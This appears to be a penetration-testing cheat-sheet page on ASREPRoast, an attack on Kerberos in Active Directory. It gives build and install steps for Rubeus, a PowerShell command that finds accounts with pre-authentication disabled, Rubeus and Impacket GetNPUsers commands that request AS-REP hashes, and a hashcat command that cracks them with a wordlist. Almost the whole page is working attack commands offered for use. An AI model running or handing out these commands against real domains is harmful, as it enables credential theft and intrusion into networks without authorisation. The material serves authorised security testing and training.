> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# ASREPRoast

> Exploit accounts with Kerberos pre-authentication disabled to capture and crack AS-REP hashes using Rubeus and Impacket.

## Installation

[https://github.com/GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)

### Clone

```bash theme={"dark"}
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus
```

### Compile

```bash theme={"dark"}
dotnet build -c Release
```

### Binary output

```bash theme={"dark"}
Rubeus/bin/Release/Rubeus.exe
```

***

## Kali Linux Package

```bash theme={"dark"}
sudo apt install rubeus
```

```bash theme={"dark"}
rubeus -h
```

```
rubeus ~ Raw Kerberos interaction and abuses
```

### Binary location

```
/usr/share/windows-resources/rubeus/Rubeus.exe
```

***

## Enumerate Vulnerable Users

```powershell theme={"dark"}
Get-DomainUser -PreauthNotRequired -verbose
```

***

## Request AS-REP Hashes

### Rubeus

```powershell theme={"dark"}
.\Rubeus.exe asreproast /nowrap
```

### Impacket (single user)

```bash theme={"dark"}
impacket-GetNPUsers -dc-ip IP-DC -request -outputfile hashes.asreproast DOMAIN/USER
```

### Impacket (user list)

```bash theme={"dark"}
impacket-GetNPUsers corp.com/ -usersfile users.txt -dc-ip IP-DC -request -format hashcat -outputfile hashes.txt
```

***

## Crack Hashes

```bash theme={"dark"}
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
```
